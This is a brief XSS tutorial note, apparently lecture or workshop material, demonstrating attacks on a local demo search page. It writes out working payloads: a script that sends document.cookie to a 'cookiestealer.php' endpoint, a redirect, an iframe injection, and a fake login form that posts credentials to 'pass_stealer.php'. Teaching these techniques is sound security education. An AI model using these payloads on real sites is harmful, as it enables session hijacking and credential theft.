[How to hack using Cross Site Scripting xss]: http://hack-hour.blogspot.tw/2012/04/how-to-hack-using-cross-site-scripting.html
[Cookie-Grabber]: http://localhost:5001/message/search?q=%3Cscript%3Elocation.href%20=%27http:%2F%2Flocalhost%2Fcookiestealer.php?cookie=%27%2BencodeURIComponent(document.cookie);%3C%2Fscript%3E
[Samy]: http://en.wikipedia.org/wiki/Samy_%28computer_worm%29

# XSS Attack

## 常見的幾種 XSS Attack 手法
- Cookie Grabber
- Phising
    - redirect
    - iframe
    - HTML injection
- Worm
- Bypass CSRF Protection


## Cookie Grabber Demo
- [Cookie-Grabber][Cookie-Grabber]
- Look like http://localhost:5001/message/search?q=%3Cscript%3Elocation.href%20=%27http:%2F%2Flocalhost%2Fcookiestealer.php?cookie=%27%2BencodeURIComponent(document.cookie);%3C%2Fscript%3E
- URL decode the magic part:

        <script>location.href ='http://localhost/cookiestealer.php?cookie='+encodeURIComponent(document.cookie);</script>


## Redirect to site (look similar, maybe www.g00gle.com)
- Look like http:/localhost:5001/message/search?q=%3Cscript%3Elocation.href%20=%27http:%2F%2Fwww.google.com%27%3C%2Fscript%3E
- URL decode the magic part:

        <script>location.href ='http://www.google.com'</script>


## iframe Demo
- Look like http://localhost:5001/message/search?q=%3Ciframe%20src=%22http:%2F%2Ftw.yahoo.com%22%20height=%22768%22%20width=%221024%22%3E%3C%2Fiframe%3E
- URL decode the magic part:

        <iframe src="http://tw.yahoo.com" height="768" width="1024"></iframe>


## HTML Injection
- Make user input their user name and password
- Look like http://localhost:5001/message/search?q=%3Cform%20id%3D%22loginform%22%20action%3D%22http%3A%2F%2Flocalhost%2Fpass_stealer.php%22%20method%3Dpost%3E%3Cdt%3E%3Clabel%20for%3D%22name%22%3EName%3C%2Flabel%3E%3Cdd%3E%3Cinput%20id%3D%22name%22%20name%3D%22name%22%20type%3D%22text%22%20value%3D%22%22%3E%3C%2Fdd%3E%3Cdt%3E%3Clabel%20for%3D%22password%22%3EPassword%3C%2Flabel%3E%3Cdd%3E%3Cinput%20id%3D%22password%22%20name%3D%22password%22%20type%3D%22password%22%20value%3D%22%22%3E%3C%2Fdd%3E%3Cinput%20id%3D%22submit%22%20name%3D%22submit%22%20type%3D%22submit%22%20value%3D%22Send%22%3E%3C%2Fform%3E

- URL decode the magic part:

        <form id="loginform" action="http://localhost/pass_stealer.php" method=post>
            <dt>
            <label for="name">Name</label>
            <dd>
                <input id="name" name="name" type="text" value="">
            </dd>
            <dt>
            <label for="password">Password</label>
            <dd>
                <input id="password" name="password" type="password" value="">
            </dd>
            <input id="submit" name="submit" type="submit" value="Send">
        </form>


## Reference
- [How to hack using Cross Site Scripting xss][How to hack using Cross Site Scripting xss]
- [Samy (computer worm) - Wikipedia][Samy]
